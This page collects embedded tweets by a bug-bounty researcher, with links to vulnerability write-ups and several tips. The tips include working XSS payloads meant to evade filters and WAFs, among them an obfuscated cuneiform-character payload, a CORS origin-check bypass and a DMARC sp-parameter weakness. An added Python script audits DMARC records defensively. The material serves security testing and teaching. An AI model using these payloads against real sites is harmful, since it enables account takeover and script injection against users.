A write-up has been published about the CVE-2020-8512 discovered by me in +25.000 Icewarp Servers
— Lütfü Mert Ceylan (@lutfumertceylan) September 9, 2021
thanks to John Leyden & @jameswalk_er for this https://t.co/tfgmnzMbh1 #bugbounty #cybersecurity
Top 25 Vulnerability Parameters based on frequency
— Lütfü Mert Ceylan (@lutfumertceylan) February 6, 2021
Vulnerable parameters including 𝗦𝗤𝗟𝗶, 𝗫𝗦𝗦, 𝗦𝗦𝗥𝗙, 𝗥𝗖𝗘, 𝗫𝗦𝗦, 𝗢𝗽𝗲𝗻 𝗥𝗲𝗱𝗶𝗿𝗲𝗰𝘁 that can be used in automation tools or manual recon. 🛡️🧙‍♂️ https://t.co/D7j9jXfinM #bugbounty #bugbountytips #cybersecurity
a Javascript Polyglot for Cross-Site Scripting (XSS) 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) January 25, 2021
<video src=">" onerror=setTimeout`confirm\x281\x29`>
-unicoded chars
-DOM window
-uncommon tags for filters
-various mimics
#bugbounty #bugbountytips #cybersecurity pic.twitter.com/d7mOadnFRq
Account Takeover via Web Cache Poisoning based Reflected XSS
— Lütfü Mert Ceylan (@lutfumertceylan) December 27, 2020
I wrote a write-up about combining Web Cache Poisoning with rXSS vulnerability. In this way, the impact has been escalated. 🧙‍♂️ https://t.co/19UaCTiPqo #bugbounty #bugbountytips #cybersecurity
If you are curious about the working structure of this payload, you can find out with this tool. (thanks to @aemkei) https://t.co/RCvxWOiuoT pic.twitter.com/Hqa0myKfmQ
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
an XSS payload, Cuneiform-alphabet based
— Lütfü Mert Ceylan (@lutfumertceylan) December 14, 2020
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty #bugbountytips #cybersecurity pic.twitter.com/dYFmWlEAR8
a Python Snippet to try Race Condition weakness in Turbo Intruder
— Lütfü Mert Ceylan (@lutfumertceylan) October 27, 2020
Source: https://t.co/bdf5EKQGqE #bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity pic.twitter.com/VpuKF7DlQt
an XSS payload generated using JSfuck, for bypass attribute filters
— Lütfü Mert Ceylan (@lutfumertceylan) October 23, 2020
Source: https://t.co/8W2jok2ZvM #bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/hOORASpbcZ
an XSS payload to bypass some waf & filters in Firefox
— Lütfü Mert Ceylan (@lutfumertceylan) October 4, 2020
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
#bugbounty #bugbountytips #bugbountytip #infosec #cybersecurity #ethicalhacking pic.twitter.com/YwxpP715Rq
I wrote a write-up about Clickjacking vulnerability. This vulnerability causes Account Takeover weakness. 🧙‍♂️🪄 https://t.co/tkf72QfHop #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec #bugbountytip
— Lütfü Mert Ceylan (@lutfumertceylan) September 27, 2020
I wrote a write-up about content spoofing vulnerability I found. This vulnerability could lead to users being manipulated. I know that this vulnerability is simple and very low impact. :) https://t.co/oLMVSyWbKW #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) August 11, 2020
Information after a simple GitHub research..
— Lütfü Mert Ceylan (@lutfumertceylan) July 27, 2020
Github is really like a black hole 🧙‍♂️ #bugbounty #bugbountytips #cybersecurity #infosec pic.twitter.com/z9cX4FQE5p
🌋 Due to DMARC Functions, sp Parameter Weakness 🌋
— Lütfü Mert Ceylan (@lutfumertceylan) July 20, 2020
If the value of the sp parameter is "none", weakness occurs even if the value of p is not "none".
[email protected] --> Not Vulnerable
[email protected] --> Vulnerable
#bugbounty #bugbountytips #bugbountytip #cybersecurity #infosec pic.twitter.com/4PJIwobMpj
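The sp condition from the DMARC tweet above, written as a record audit. This is an added example, not part of the original tweets; the function names and the example.com records are constructed for illustration.

```python
# Added example: flag a DMARC record whose sp tag weakens the domain policy.
# Function names and the sample records are constructed for illustration.
POLICIES = {"none", "quarantine", "reject"}


def parse_dmarc(record):
    """Split a DMARC TXT record into {tag: value}; tag names lower-cased."""
    tags = {}
    for part in record.split(";"):
        name, sep, value = part.partition("=")
        if sep:  # ignore empty segments such as a trailing ';'
            tags[name.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record: missing v=DMARC1")
    return tags


def effective_policies(record):
    """Return (p, sp) as applied by receivers; sp falls back to p if absent."""
    tags = parse_dmarc(record)
    p = tags.get("p", "").lower()
    sp = tags.get("sp", p).lower()
    for tag, value in (("p", p), ("sp", sp)):
        if value not in POLICIES:
            raise ValueError("invalid %s policy: %r" % (tag, value))
    return p, sp


def audit(record):
    """List findings for policies that leave mail unenforced."""
    p, sp = effective_policies(record)
    findings = []
    if p == "none":
        findings.append("p=none: domain is monitor-only")
    if sp == "none" and p != "none":
        findings.append("sp=none with p=%s: subdomains are not enforced" % p)
    return findings


if __name__ == "__main__":
    samples = [  # constructed records
        "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@example.com",
        "v=DMARC1; p=reject; sp=none; rua=mailto:dmarc@example.com",
        "v=DMARC1; p=quarantine;",
    ]
    for rec in samples:
        print(rec, "->", audit(rec) or "no findings")
```

A subdomain that publishes its own DMARC record is governed by that record, so the sp finding applies to subdomains without one.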
🚀 How can you make a Javascript Polyglot for XSS? 🚀 #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked pic.twitter.com/qmd3qUpQ2g
— Lütfü Mert Ceylan (@lutfumertceylan) July 17, 2020
I was included in the Hall of Fame (1st quarter) by Mozilla! 🥳 https://t.co/IpMxI18LCm #bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame
— Lütfü Mert Ceylan (@lutfumertceylan) July 12, 2020
I wrote a write-up about CORS vulnerability. This vulnerability causes both Account Takeover and Sensitive Data Leakage weakness. 🛡️🧙‍♂️ https://t.co/zaoorAh1cD #bugbounty #bugbountytips #ethicalhacking #cybersecurity #infosec
— Lütfü Mert Ceylan (@lutfumertceylan) July 4, 2020
🛡️ CORS Protection Bypass 🛡️
— Lütfü Mert Ceylan (@lutfumertceylan) July 1, 2020
If the system only allows "Origin: https://t.co/YB5OiaWlDW",
Use a gTLD containing "com" -> Origin: https://t.co/S0FQ43tWro #bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking